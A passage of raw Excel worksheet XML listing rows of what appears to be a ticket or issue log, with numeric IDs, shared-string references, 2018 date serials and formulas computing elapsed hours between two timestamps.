      <c r="C1986" t="s">
        <v>120</v>
      </c>
      <c r="D1986" t="s">
        <v>7</v>
      </c>
      <c r="E1986" s="1">
        <v>43197.904247685183</v>
      </c>
      <c r="F1986" s="1">
        <v>43199.864988425928</v>
      </c>
      <c r="G1986" t="s">
        <v>121</v>
      </c>
      <c r="H1986" t="str">
        <f>TEXT(F1986-E1986,"[h]")</f>
        <v>47</v>
      </c>
    </row>
    <row r="1987" spans="1:8" hidden="1">
      <c r="A1987" t="s">
        <v>272</v>
      </c>
      <c r="B1987">
        <v>10859</v>
      </c>
      <c r="C1987" t="s">
        <v>273</v>
      </c>
      <c r="D1987" t="s">
        <v>7</v>
      </c>
      <c r="E1987" s="1">
        <v>43197.745717592596</v>
      </c>
      <c r="F1987" s="1">
        <v>43199.629606481481</v>
      </c>
      <c r="G1987" t="s">
        <v>95</v>
      </c>
      <c r="H1987" t="str">
        <f>TEXT(F1987-E1987,"[h]")</f>
        <v>45</v>
      </c>
    </row>
    <row r="1988" spans="1:8">
      <c r="A1988" t="s">
        <v>274</v>
      </c>
      <c r="B1988">
        <v>10857</v>
      </c>
      <c r="C1988" t="s">
        <v>275</v>
      </c>
      <c r="D1988" t="s">
        <v>7</v>
      </c>
      <c r="E1988" s="1">
        <v>43197.011099537034</v>
      </c>
      <c r="F1988" s="1">
        <v>43197.176249999997</v>
      </c>
      <c r="G1988" t="s">
        <v>25</v>
      </c>
      <c r="H1988" t="str">
        <f>TEXT(F1988-E1988,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1989" spans="1:8" hidden="1">
      <c r="A1989" t="s">
        <v>276</v>
      </c>
      <c r="B1989">
        <v>10856</v>
      </c>
      <c r="C1989" t="s">
        <v>277</v>
      </c>
      <c r="D1989" t="s">
        <v>7</v>
      </c>
      <c r="E1989" s="1">
        <v>43196.957662037035</v>
      </c>
      <c r="F1989" s="1">
        <v>43608.183391203704</v>
      </c>
      <c r="G1989" t="s">
        <v>278</v>
      </c>
      <c r="H1989" t="str">
        <f>TEXT(F1989-E1989,"[h]")</f>
        <v>9869</v>
      </c>
    </row>
    <row r="1990" spans="1:8" hidden="1">
      <c r="A1990" t="s">
        <v>279</v>
      </c>
      <c r="B1990">
        <v>10855</v>
      </c>
      <c r="C1990" t="s">
        <v>280</v>
      </c>
      <c r="D1990" t="s">
        <v>7</v>
      </c>
      <c r="E1990" s="1">
        <v>43196.750740740739</v>
      </c>
      <c r="F1990" s="1">
        <v>43521.825416666667</v>
      </c>
      <c r="G1990" t="s">
        <v>37</v>
      </c>
      <c r="H1990" t="str">
        <f>TEXT(F1990-E1990,"[h]")</f>
        <v>7801</v>
      </c>
    </row>
    <row r="1991" spans="1:8" hidden="1">
      <c r="A1991" t="s">
        <v>281</v>
      </c>
      <c r="B1991">
        <v>10850</v>
      </c>
      <c r="C1991" t="s">
        <v>282</v>
      </c>
      <c r="D1991" t="s">
        <v>7</v>
      </c>
      <c r="E1991" s="1">
        <v>43194.778796296298</v>
      </c>
      <c r="F1991" s="1">
        <v>43199.618356481478</v>
      </c>
      <c r="G1991" t="s">
        <v>283</v>
      </c>
      <c r="H1991" t="str">
        <f>TEXT(F1991-E1991,"[h]")</f>
        <v>116</v>
      </c>
    </row>
    <row r="1992" spans="1:8">
      <c r="A1992" t="s">
        <v>284</v>
      </c>
      <c r="B1992">
        <v>10849</v>
      </c>
      <c r="C1992" t="s">
        <v>285</v>
      </c>
      <c r="D1992" t="s">
        <v>7</v>
      </c>
      <c r="E1992" s="1">
        <v>43194.667129629626</v>
      </c>
      <c r="F1992" s="1">
        <v>43194.695798611108</v>
      </c>
      <c r="G1992" t="s">
        <v>112</v>
      </c>
      <c r="H1992" t="str">
        <f>TEXT(F1992-E1992,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1993" spans="1:8" hidden="1">
      <c r="A1993" t="s">
        <v>286</v>
      </c>
      <c r="B1993">
        <v>10848</v>
      </c>
      <c r="C1993" t="s">
        <v>287</v>
      </c>
      <c r="D1993" t="s">
        <v>7</v>
      </c>
      <c r="E1993" s="1">
        <v>43194.631886574076</v>
      </c>
      <c r="F1993" s="1">
        <v>43195.441805555558</v>
      </c>
      <c r="G1993" t="s">
        <v>118</v>
      </c>
      <c r="H1993" t="str">
        <f>TEXT(F1993-E1993,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="1994" spans="1:8" hidden="1">
      <c r="A1994" t="s">
        <v>288</v>
      </c>
      <c r="B1994">
        <v>10847</v>
      </c>
      <c r="C1994" t="s">
        <v>289</v>
      </c>
      <c r="D1994" t="s">
        <v>7</v>
      </c>
      <c r="E1994" s="1">
        <v>43194.459618055553</v>
      </c>
      <c r="F1994" s="1">
        <v>43207.89403935185</v>
      </c>
      <c r="G1994" t="s">
        <v>290</v>
      </c>
      <c r="H1994" t="str">
        <f>TEXT(F1994-E1994,"[h]")</f>
        <v>322</v>
      </c>
    </row>
    <row r="1995" spans="1:8" hidden="1">
      <c r="A1995" t="s">
        <v>291</v>
      </c>
      <c r="B1995">
        <v>10844</v>
      </c>
      <c r="C1995" t="s">
        <v>292</v>
      </c>
      <c r="D1995" t="s">
        <v>7</v>
      </c>
      <c r="E1995" s="1">
        <v>43194.342303240737</v>
      </c>
      <c r="F1995" s="1">
        <v>43208.643750000003</v>
      </c>
      <c r="G1995" t="s">
        <v>51</v>
      </c>
      <c r="H1995" t="str">
        <f>TEXT(F1995-E1995,"[h]")</f>
        <v>343</v>
      </c>
    </row>
    <row r="1996" spans="1:8" hidden="1">
      <c r="A1996" t="s">
        <v>293</v>
      </c>
      <c r="B1996">
        <v>10842</v>
      </c>
      <c r="C1996" t="s">
        <v>294</v>
      </c>
      <c r="D1996" t="s">
        <v>7</v>
      </c>
      <c r="E1996" s="1">
        <v>43193.834120370368</v>
      </c>
      <c r="F1996" s="1">
        <v>43197.002453703702</v>
      </c>
      <c r="G1996" t="s">
        <v>295</v>
      </c>
      <c r="H1996" t="str">
        <f>TEXT(F1996-E1996,"[h]")</f>
        <v>76</v>
      </c>
    </row>
    <row r="1997" spans="1:8" hidden="1">
      <c r="A1997" t="s">
        <v>296</v>
      </c>
      <c r="B1997">
        <v>10841</v>
      </c>
      <c r="C1997" t="s">
        <v>297</v>
      </c>
      <c r="D1997" t="s">
        <v>7</v>
      </c>
      <c r="E1997" s="1">
        <v>43193.613032407404</v>
      </c>
      <c r="F1997" s="1">
        <v>43320.003009259257</v>
      </c>
      <c r="G1997" t="s">
        <v>118</v>
      </c>
      <c r="H1997" t="str">
        <f>TEXT(F1997-E1997,"[h]")</f>
        <v>3033</v>
      </c>
    </row>
    <row r="1998" spans="1:8" hidden="1">
      <c r="B1998">
        <v>10840</v>
      </c>
      <c r="C1998" t="s">
        <v>298</v>
      </c>
      <c r="D1998" t="s">
        <v>7</v>
      </c>
      <c r="E1998" s="1">
        <v>43193.549108796295</v>
      </c>
      <c r="F1998" s="1">
        <v>43193.833668981482</v>
      </c>
      <c r="G1998" t="s">
        <v>90</v>
      </c>
      <c r="H1998" t="str">
        <f>TEXT(F1998-E1998,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1999" spans="1:8" hidden="1">
      <c r="A1999" t="s">
        <v>299</v>
      </c>
      <c r="B1999">
        <v>10839</v>
      </c>
      <c r="C1999" t="s">
        <v>300</v>
      </c>
      <c r="D1999" t="s">
        <v>7</v>
      </c>
      <c r="E1999" s="1">
        <v>43193.345578703702</v>
      </c>
      <c r="F1999" s="1">
        <v>43545.656469907408</v>
      </c>
      <c r="G1999" t="s">
        <v>301</v>
      </c>
      <c r="H1999" t="str">
        <f>TEXT(F1999-E1999,"[h]")</f>
        <v>8455</v>
      </c>
    </row>
    <row r="2000" spans="1:8" hidden="1">
      <c r="A2000" t="s">
        <v>302</v>
      </c>
      <c r="B2000">
        <v>10837</v>
      </c>
      <c r="C2000" t="s">
        <v>303</v>
      </c>
      <c r="D2000" t="s">
        <v>7</v>
      </c>
      <c r="E2000" s="1">
        <v>43192.673715277779</v>
      </c>
      <c r="F2000" s="1">
        <v>43192.686469907407</v>
      </c>
      <c r="G2000" t="s">
        <v>304</v>
      </c>
      <c r="H2000" t="str">
        <f>TEXT(F2000-E2000,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2001" spans="1:8">
      <c r="B2001">
        <v>10836</v>
      </c>
      <c r="C2001" t="s">
        <v>305</v>
      </c>
      <c r="D2001" t="s">
        <v>7</v>
      </c>
      <c r="E2001" s="1">
        <v>43191.899178240739</v>
      </c>
      <c r="F2001" s="1">
        <v>43191.923171296294</v>
      </c>
      <c r="G2001" t="s">
        <v>306</v>
      </c>
      <c r="H2001" t="str">
        <f>TEXT(F2001-E2001,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2002" spans="1:8" hidden="1">
      <c r="B2002">
        <v>10834</v>
      </c>
      <c r="C2002" t="s">
        <v>307</v>
      </c>
      <c r="D2002" t="s">
        <v>7</v>
      </c>
      <c r="E2002" s="1">
        <v>43191.667141203703</v>
      </c>
      <c r="F2002" s="1">
        <v>43191.762476851851</v>
      </c>
      <c r="G2002" t="s">
        <v>51</v>
      </c>
      <c r="H2002" t="str">
        <f>TEXT(F2002-E2002,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="2003" spans="1:8" hidden="1">
      <c r="A2003" t="s">
        <v>308</v>
      </c>
      <c r="B2003">
        <v>10833</v>
      </c>
      <c r="C2003" t="s">
        <v>309</v>
      </c>
      <c r="D2003" t="s">
        <v>7</v>
      </c>
      <c r="E2003" s="1">
        <v>43191.557175925926</v>
      </c>
      <c r="F2003" s="1">
        <v>43191.730138888888</v>
      </c>
      <c r="G2003" t="s">
        <v>37</v>
      </c>
      <c r="H2003" t="str">
        <f>TEXT(F2003-E2003,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="2004" spans="1:8" hidden="1">
      <c r="A2004" t="s">
        <v>310</v>
      </c>
      <c r="B2004">
        <v>10831</v>
      </c>
      <c r="C2004" t="s">
        <v>311</v>
      </c>
      <c r="D2004" t="s">
        <v>7</v>
      </c>
      <c r="E2004" s="1">
        <v>43189.56590277778</v>
      </c>
      <c r="F2004" s="1">
        <v>43189.636666666665</v>
      </c>
      <c r="G2004" t="s">
        <v>90</v>
      </c>
      <c r="H2004" t="str">
        <f>TEXT(F2004-E2004,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2005" spans="1:8">
      <c r="A2005" t="s">
        <v>312</v>
      </c>
      <c r="B2005">
        <v>10830</v>
      </c>
      <c r="C2005" t="s">
        <v>313</v>
      </c>
      <c r="D2005" t="s">
        <v>7</v>
      </c>
      <c r="E2005" s="1">
        <v>43189.369664351849</v>
      </c>
      <c r="F2005" s="1">
        <v>43189.723877314813</v>
      </c>
      <c r="G2005" t="s">
        <v>314</v>
      </c>
      <c r="H2005" t="str">
        <f>TEXT(F2005-E2005,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="2006" spans="1:8" hidden="1">
      <c r="B2006">
        <v>10829</v>
      </c>
      <c r="C2006" t="s">
        <v>315</v>
      </c>
      <c r="D2006" t="s">
        <v>7</v>
      </c>
      <c r="E2006" s="1">
        <v>43189.193425925929</v>
      </c>
      <c r="F2006" s="1">
        <v>43189.370439814818</v>
      </c>
      <c r="G2006" t="s">
        <v>138</v>
      </c>
      <c r="H2006" t="str">
        <f>TEXT(F2006-E2006,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="2007" spans="1:8">
      <c r="A2007" t="s">
        <v>316</v>
      </c>
      <c r="B2007">
        <v>10828</v>
      </c>
      <c r="C2007" t="s">
        <v>317</v>
      </c>
      <c r="D2007" t="s">
        <v>7</v>
      </c>
      <c r="E2007" s="1">
        <v>43189.192812499998</v>
      </c>
      <c r="F2007" s="1">
        <v>43189.36204861111</v>
      </c>
      <c r="G2007" t="s">
        <v>314</v>
      </c>
      <c r="H2007" t="str">
        <f>TEXT(F2007-E2007,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="2008" spans="1:8" hidden="1">
      <c r="A2008" t="s">
        <v>318</v>
      </c>
      <c r="B2008">
        <v>10827</v>
      </c>
      <c r="C2008" t="s">
        <v>319</v>
      </c>
      <c r="D2008" t="s">
        <v>7</v>
      </c>
      <c r="E2008" s="1">
        <v>43189.041365740741</v>
      </c>
      <c r="F2008" s="1">
        <v>43191.838437500002</v>
      </c>
      <c r="G2008" t="s">
        <v>320</v>
      </c>
      <c r="H2008" t="str">
        <f>TEXT(F2008-E2008,"[h]")</f>
        <v>67</v>
      </c>
    </row>
    <row r="2009" spans="1:8">
      <c r="A2009" t="s">
        <v>321</v>
      </c>
      <c r="B2009">
        <v>10826</v>
      </c>
      <c r="C2009" t="s">
        <v>322</v>
      </c>
      <c r="D2009" t="s">
        <v>7</v>
      </c>
      <c r="E2009" s="1">
        <v>43188.781724537039</v>
      </c>
      <c r="F2009" s="1">
        <v>43196.922569444447</v>
      </c>
      <c r="G2009" t="s">
        <v>16</v>
      </c>
      <c r="H2009" t="str">
        <f>TEXT(F2009-E2009,"[h]")</f>
        <v>195</v>
      </c>
    </row>
    <row r="2010" spans="1:8">
      <c r="A2010" t="s">
        <v>323</v>
      </c>
      <c r="B2010">
        <v>10824</v>
      </c>
      <c r="C2010" t="s">
        <v>324</v>
      </c>
      <c r="D2010" t="s">
        <v>7</v>
      </c>
      <c r="E2010" s="1">
        <v>43188.424884259257</v>
      </c>
      <c r="F2010" s="1">
        <v>43215.009976851848</v>
      </c>
      <c r="G2010" t="s">
        <v>16</v>
      </c>
      <c r="H2010" t="str">
        <f>TEXT(F2010-E2010,"[h]")</f>
        <v>638</v>
      </c>
    </row>
    <row r="2011" spans="1:8">
      <c r="A2011" t="s">
        <v>325</v>
      </c>
      <c r="B2011">
        <v>10822</v>
      </c>
      <c r="C2011" t="s">
        <v>326</v>
      </c>
      <c r="D2011" t="s">
        <v>7</v>
      </c>
      <c r="E2011" s="1">
        <v>43188.274074074077</v>
      </c>
      <c r="F2011" s="1">
        <v>43207.216689814813</v>
      </c>
      <c r="G2011" t="s">
        <v>31</v>
      </c>
      <c r="H2011" t="str">
        <f>TEXT(F2011-E2011,"[h]")</f>
        <v>454</v>
      </c>
    </row>
    <row r="2012" spans="1:8" hidden="1">
      <c r="A2012" t="s">
        <v>327</v>
      </c>
      <c r="B2012">
        <v>10821</v>
      </c>
      <c r="C2012" t="s">
        <v>328</v>
      </c>
      <c r="D2012" t="s">
        <v>7</v>
      </c>
      <c r="E2012" s="1">
        <v>43188.262974537036</v>
      </c>
      <c r="F2012" s="1">
        <v>43295.186990740738</v>
      </c>
      <c r="G2012" t="s">
        <v>51</v>
      </c>
      <c r="H2012" t="str">
        <f>TEXT(F2012-E2012,"[h]")</f>
        <v>2566</v>
      </c>
    </row>
    <row r="2013" spans="1:8">
      <c r="A2013" t="s">
        <v>329</v>
      </c>
      <c r="B2013">
        <v>10814</v>
      </c>
      <c r="C2013" t="s">
        <v>330</v>
      </c>
      <c r="D2013" t="s">
        <v>7</v>
      </c>
      <c r="E2013" s="1">
        <v>43186.867349537039</v>
      </c>
      <c r="F2013" s="1">
        <v>43195.79760416667</v>
      </c>
      <c r="G2013" t="s">
        <v>25</v>
      </c>
      <c r="H2013" t="str">
        <f>TEXT(F2013-E2013,"[h]")</f>
        <v>214</v>
      </c>
    </row>
    <row r="2014" spans="1:8" hidden="1">
      <c r="A2014" t="s">
        <v>334</v>
      </c>
      <c r="B2014">
        <v>10810</v>
      </c>
      <c r="C2014" t="s">
        <v>335</v>
      </c>
      <c r="D2014" t="s">
        <v>7</v>
      </c>
      <c r="E2014" s="1">
        <v>43186.460787037038</v>
      </c>
      <c r="F2014" s="1">
        <v>43190.631724537037</v>
      </c>
      <c r="G2014" t="s">
        <v>336</v>
      </c>
      <c r="H2014" t="str">
        <f>TEXT(F2014-E2014,"[h]")</f>
        <v>100</v>
      </c>
    </row>
    <row r="2015" spans="1:8" hidden="1">
      <c r="A2015" t="s">
        <v>331</v>
      </c>
      <c r="B2015">
        <v>10809</v>
      </c>
      <c r="C2015" t="s">
        <v>332</v>
      </c>
      <c r="D2015" t="s">
        <v>7</v>
      </c>
      <c r="E2015" s="1">
        <v>43185.971504629626</v>
      </c>
      <c r="F2015" s="1">
        <v>43186.401365740741</v>
      </c>
      <c r="G2015" t="s">
        <v>333</v>
      </c>
      <c r="H2015" t="str">
        <f>TEXT(F2015-E2015,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="2016" spans="1:8" hidden="1">
      <c r="A2016" t="s">
        <v>337</v>
      </c>
      <c r="B2016">
        <v>10808</v>
      </c>
      <c r="C2016" t="s">
        <v>338</v>
      </c>
      <c r="D2016" t="s">
        <v>7</v>
      </c>
      <c r="E2016" s="1">
        <v>43185.816423611112</v>
      </c>
      <c r="F2016" s="1">
        <v>43186.013379629629</v>
      </c>
      <c r="G2016" t="s">
        <v>304</v>
      </c>
      <c r="H2016" t="str">
        <f>TEXT(F2016-E2016,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="2017" spans="1:8" hidden="1">
      <c r="B2017">
        <v>10807</v>
      </c>
      <c r="C2017" t="s">
        <v>339</v>
      </c>
      <c r="D2017" t="s">
        <v>7</v>
      </c>
      <c r="E2017" s="1">
        <v>43185.788217592592</v>
      </c>
      <c r="F2017" s="1">
        <v>43186.017094907409</v>
      </c>
      <c r="G2017" t="s">
        <v>51</v>
      </c>
      <c r="H2017" t="str">
        <f>TEXT(F2017-E2017,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="2018" spans="1:8" hidden="1">
      <c r="A2018" t="s">
        <v>340</v>
      </c>
      <c r="B2018">
        <v>10803</v>
      </c>
      <c r="C2018" t="s">
        <v>341</v>
      </c>
      <c r="D2018" t="s">
        <v>7</v>
      </c>
      <c r="E2018" s="1">
        <v>43185.464918981481</v>
      </c>
      <c r="F2018" s="1">
        <v>43604.664664351854</v>
      </c>
      <c r="G2018" t="s">
        <v>204</v>
      </c>
      <c r="H2018" t="str">
        <f>TEXT(F2018-E2018,"[h]")</f>
        <v>10060</v>
      </c>
    </row>
    <row r="2019" spans="1:8">
      <c r="A2019" t="s">
        <v>342</v>
      </c>
      <c r="B2019">
        <v>10802</v>
      </c>
      <c r="C2019" t="s">
        <v>343</v>
      </c>
      <c r="D2019" t="s">
        <v>7</v>
      </c>
      <c r="E2019" s="1">
        <v>43185.341851851852</v>
      </c>
      <c r="F2019" s="1">
        <v>43197.140879629631</v>
      </c>
      <c r="G2019" t="s">
        <v>344</v>
      </c>
      <c r="H2019" t="str">
        <f>TEXT(F2019-E2019,"[h]")</f>
        <v>283</v>
      </c>
    </row>
    <row r="2020" spans="1:8" hidden="1">
      <c r="A2020" t="s">
        <v>345</v>
      </c>
      <c r="B2020">
        <v>10800</v>
      </c>
      <c r="C2020" t="s">
        <v>346</v>
      </c>
      <c r="D2020" t="s">
        <v>7</v>
      </c>
      <c r="E2020" s="1">
        <v>43185.208564814813</v>
      </c>
      <c r="F2020" s="1">
        <v>43195.837071759262</v>
      </c>
      <c r="G2020" t="s">
        <v>66</v>
      </c>
      <c r="H2020" t="str">
        <f>TEXT(F2020-E2020,"[h]")</f>
        <v>255</v>
      </c>
    </row>
    <row r="2021" spans="1:8" hidden="1">
      <c r="A2021" t="s">
        <v>347</v>
      </c>
      <c r="B2021">
        <v>10797</v>
      </c>
      <c r="C2021" t="s">
        <v>348</v>
      </c>
      <c r="D2021" t="s">
        <v>7</v>
      </c>
      <c r="E2021" s="1">
        <v>43184.844918981478</v>
      </c>
      <c r="F2021" s="1">
        <v>43390.22446759259</v>
      </c>
      <c r="G2021" t="s">
        <v>201</v>
      </c>
      <c r="H2021" t="str">
        <f>TEXT(F2021-E2021,"[h]")</f>
        <v>4929</v>
      </c>
    </row>
    <row r="2022" spans="1:8">
      <c r="A2022" t="s">
        <v>349</v>
      </c>
      <c r="B2022">
        <v>10796</v>
      </c>
      <c r="C2022" t="s">
        <v>350</v>
      </c>
      <c r="D2022" t="s">
        <v>7</v>
      </c>
      <c r="E2022" s="1">
        <v>43184.493784722225</v>
      </c>
      <c r="F2022" s="1">
        <v>43199.787916666668</v>
      </c>
      <c r="G2022" t="s">
        <v>25</v>
      </c>
      <c r="H2022" t="str">
        <f>TEXT(F2022-E2022,"[h]")</f>
        <v>367</v>
      </c>
    </row>
    <row r="2023" spans="1:8">
      <c r="A2023" t="s">
        <v>351</v>
      </c>
      <c r="B2023">
        <v>10795</v>
      </c>
      <c r="C2023" t="s">
        <v>352</v>
      </c>
      <c r="D2023" t="s">
        <v>7</v>
      </c>
      <c r="E2023" s="1">
        <v>43184.281851851854</v>
      </c>
      <c r="F2023" s="1">
        <v>43185.557766203703</v>
      </c>
      <c r="G2023" t="s">
        <v>16</v>
      </c>
      <c r="H2023" t="str">
        <f>TEXT(F2023-E2023,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="2024" spans="1:8">
      <c r="A2024" t="s">
        <v>353</v>
      </c>
      <c r="B2024">
        <v>10794</v>
      </c>
      <c r="C2024" t="s">
        <v>354</v>
      </c>
      <c r="D2024" t="s">
        <v>7</v>
      </c>
      <c r="E2024" s="1">
        <v>43184.263935185183</v>
      </c>
      <c r="F2024" s="1">
        <v>43185.557766203703</v>
      </c>
      <c r="G2024" t="s">
        <v>16</v>
      </c>
      <c r="H2024" t="str">
        <f>TEXT(F2024-E2024,"[h]")</f>
        <v>31</v>
      </c>
    </row>
    <row r="2025" spans="1:8" hidden="1">
      <c r="A2025" t="s">
        <v>355</v>
      </c>
      <c r="B2025">
        <v>10793</v>
      </c>
      <c r="C2025" t="s">
        <v>356</v>
      </c>
      <c r="D2025" t="s">
        <v>7</v>
      </c>
      <c r="E2025" s="1">
        <v>43184.177615740744</v>
      </c>
      <c r="F2025" s="1">
        <v>43184.321770833332</v>
      </c>
      <c r="G2025" t="s">
        <v>333</v>
      </c>
      <c r="H2025" t="str">
        <f>TEXT(F2025-E2025,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="2026" spans="1:8">
      <c r="A2026" t="s">
        <v>357</v>
      </c>
      <c r="B2026">
        <v>10792</v>
      </c>
      <c r="C2026" t="s">
        <v>358</v>
      </c>
      <c r="D2026" t="s">
        <v>7</v>
      </c>
      <c r="E2026" s="1">
        <v>43183.767210648148</v>
      </c>
      <c r="F2026" s="1">
        <v>43185.329988425925</v>
      </c>
      <c r="G2026" t="s">
        <v>16</v>
      </c>
      <c r="H2026" t="str">
        <f>TEXT(F2026-E2026,"[h]")</f>
        <v>37</v>
      </c>
    </row>
    <row r="2027" spans="1:8" hidden="1">
      <c r="A2027" t="s">
        <v>359</v>
      </c>
      <c r="B2027">
        <v>10791</v>
      </c>
      <c r="C2027" t="s">
        <v>360</v>
      </c>
      <c r="D2027" t="s">
        <v>7</v>
      </c>
      <c r="E2027" s="1">
        <v>43182.980567129627</v>
      </c>
      <c r="F2027" s="1">
        <v>43614.448819444442</v>
      </c>
      <c r="G2027" t="s">
        <v>301</v>
      </c>
      <c r="H2027" t="str">
        <f>TEXT(F2027-E2027,"[h]")</f>
        <v>10355</v>
      </c>
    </row>
    <row r="2028" spans="1:8" hidden="1">
      <c r="A2028" t="s">
        <v>361</v>
      </c>
      <c r="B2028">
        <v>10790</v>
      </c>
      <c r="C2028" t="s">
        <v>362</v>
      </c>
      <c r="D2028" t="s">
        <v>7</v>
      </c>
      <c r="E2028" s="1">
        <v>43182.789513888885</v>
      </c>
      <c r="F2028" s="1">
        <v>43183.703402777777</v>
      </c>
      <c r="G2028" t="s">
        <v>95</v>
      </c>
      <c r="H2028" t="str">
        <f>TEXT(F2028-E2028,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="2029" spans="1:8" hidden="1">
      <c r="A2029" t="s">
        <v>363</v>
      </c>
      <c r="B2029">
        <v>10786</v>
      </c>
      <c r="C2029" t="s">
        <v>364</v>
      </c>
      <c r="D2029" t="s">
        <v>7</v>
      </c>
      <c r="E2029" s="1">
        <v>43181.77920138889</v>
      </c>
      <c r="F2029" s="1">
        <v>43190.367152777777</v>
      </c>
      <c r="G2029" t="s">
        <v>365</v>
      </c>
      <c r="H2029" t="str">
        <f>TEXT(F2029-E2029,"[h]")</f>
        <v>206</v>
      </c>
    </row>
    <row r="2030" spans="1:8" hidden="1">
      <c r="A2030" t="s">
        <v>366</v>
      </c>
      <c r="B2030">
        <v>10785</v>
      </c>
      <c r="C2030" t="s">
        <v>367</v>
      </c>
      <c r="D2030" t="s">
        <v>7</v>
      </c>
      <c r="E2030" s="1">
        <v>43181.768657407411</v>
      </c>
      <c r="F2030" s="1">
        <v>43182.854849537034</v>
      </c>
      <c r="G2030" t="s">
        <v>368</v>
      </c>
      <c r="H2030" t="str">
        <f>TEXT(F2030-E2030,"[h]")</f>
        <v>26</v>
      </c>
    </row>
    <row r="2031" spans="1:8" hidden="1">
      <c r="A2031" t="s">
        <v>369</v>
      </c>
      <c r="B2031">
        <v>10782</v>
      </c>
      <c r="C2031" t="s">
        <v>370</v>
      </c>
      <c r="D2031" t="s">
        <v>7</v>
      </c>
      <c r="E2031" s="1">
        <v>43181.09747685185</v>
      </c>
      <c r="F2031" s="1">
        <v>43599.207152777781</v>
      </c>
      <c r="G2031" t="s">
        <v>251</v>
      </c>
      <c r="H2031" t="str">
        <f>TEXT(F2031-E2031,"[h]")</f>
        <v>10034</v>
      </c>
    </row>
    <row r="2032" spans="1:8" hidden="1">
      <c r="A2032" t="s">
        <v>371</v>
      </c>
      <c r="B2032">
        <v>10781</v>
      </c>
      <c r="C2032" t="s">
        <v>372</v>
      </c>
      <c r="D2032" t="s">
        <v>7</v>
      </c>
      <c r="E2032" s="1">
        <v>43181.019907407404</v>
      </c>
      <c r="F2032" s="1">
        <v>43191.672349537039</v>
      </c>
      <c r="G2032" t="s">
        <v>373</v>
      </c>
      <c r="H2032" t="str">
        <f>TEXT(F2032-E2032,"[h]")</f>
        <v>255</v>
      </c>
    </row>
    <row r="2033" spans="1:8">
      <c r="A2033" t="s">
        <v>374</v>
      </c>
      <c r="B2033">
        <v>10779</v>
      </c>
      <c r="C2033" t="s">
        <v>375</v>
      </c>
      <c r="D2033" t="s">
        <v>7</v>
      </c>
      <c r="E2033" s="1">
        <v>43180.940289351849</v>
      </c>
      <c r="F2033" s="1">
        <v>43199.577638888892</v>
      </c>
      <c r="G2033" t="s">
        <v>376</v>
      </c>
      <c r="H2033" t="str">
        <f>TEXT(F2033-E2033,"[h]")</f>
        <v>447</v>
      </c>
    </row>
    <row r="2034" spans="1:8">
      <c r="A2034" t="s">
        <v>127</v>
      </c>
      <c r="B2034">
        <v>10778</v>
      </c>
      <c r="C2034" t="s">
        <v>128</v>
      </c>
      <c r="D2034" t="s">
        <v>7</v>
      </c>
      <c r="E2034" s="1">
        <v>43180.920983796299</v>
      </c>
      <c r="F2034" s="1">
        <v>43180.953263888892</v>
      </c>
      <c r="G2034" t="s">
        <v>129</v>
      </c>
      <c r="H2034" t="str">
        <f>TEXT(F2034-E2034,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2035" spans="1:8" hidden="1">
      <c r="A2035" t="s">
        <v>377</v>
      </c>
      <c r="B2035">
        <v>10777</v>
      </c>
      <c r="C2035" t="s">
        <v>378</v>
      </c>
      <c r="D2035" t="s">
        <v>7</v>
      </c>
      <c r="E2035" s="1">
        <v>43180.784131944441</v>
      </c>
      <c r="F2035" s="1">
        <v>43180.824930555558</v>
      </c>
      <c r="G2035" t="s">
        <v>95</v>
      </c>
      <c r="H2035" t="str">
        <f>TEXT(F2035-E2035,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2036" spans="1:8" hidden="1">
      <c r="A2036" t="s">
        <v>379</v>
      </c>
      <c r="B2036">
        <v>10776</v>
      </c>
      <c r="C2036" t="s">
        <v>380</v>
      </c>
      <c r="D2036" t="s">
        <v>7</v>
      </c>
      <c r="E2036" s="1">
        <v>43180.27547453704</v>
      </c>
      <c r="F2036" s="1">
        <v>43642.770694444444</v>
      </c>
      <c r="G2036" t="s">
        <v>381</v>
      </c>
      <c r="H2036" t="str">
        <f>TEXT(F2036-E2036,"[h]")</f>
        <v>11099</v>
      </c>
    </row>
    <row r="2037" spans="1:8">
      <c r="A2037" t="s">
        <v>382</v>
      </c>
      <c r="B2037">
        <v>10775</v>
      </c>
      <c r="C2037" t="s">
        <v>383</v>
      </c>
      <c r="D2037" t="s">
        <v>7</v>
      </c>
      <c r="E2037" s="1">
        <v>43180.090601851851</v>
      </c>
      <c r="F2037" s="1">
        <v>43210.271944444445</v>
      </c>
      <c r="G2037" t="s">
        <v>16</v>
      </c>
      <c r="H2037" t="str">
        <f>TEXT(F2037-E2037,"[h]")</f>
        <v>724</v>
      </c>
    </row>
    <row r="2038" spans="1:8" hidden="1">
      <c r="A2038" t="s">
        <v>384</v>
      </c>
      <c r="B2038">
        <v>10768</v>
      </c>
      <c r="C2038" t="s">
        <v>385</v>
      </c>
      <c r="D2038" t="s">
        <v>7</v>
      </c>
      <c r="E2038" s="1">
        <v>43178.825567129628</v>
      </c>
      <c r="F2038" s="1">
        <v>43183.734432870369</v>
      </c>
      <c r="G2038" t="s">
        <v>95</v>
      </c>
      <c r="H2038" t="str">
        <f>TEXT(F2038-E2038,"[h]")</f>
        <v>117</v>
      </c>
    </row>
    <row r="2039" spans="1:8" hidden="1">
      <c r="B2039">
        <v>10766</v>
      </c>
      <c r="C2039" t="s">
        <v>386</v>
      </c>
      <c r="D2039" t="s">
        <v>7</v>
      </c>
      <c r="E2039" s="1">
        <v>43178.315335648149</v>
      </c>
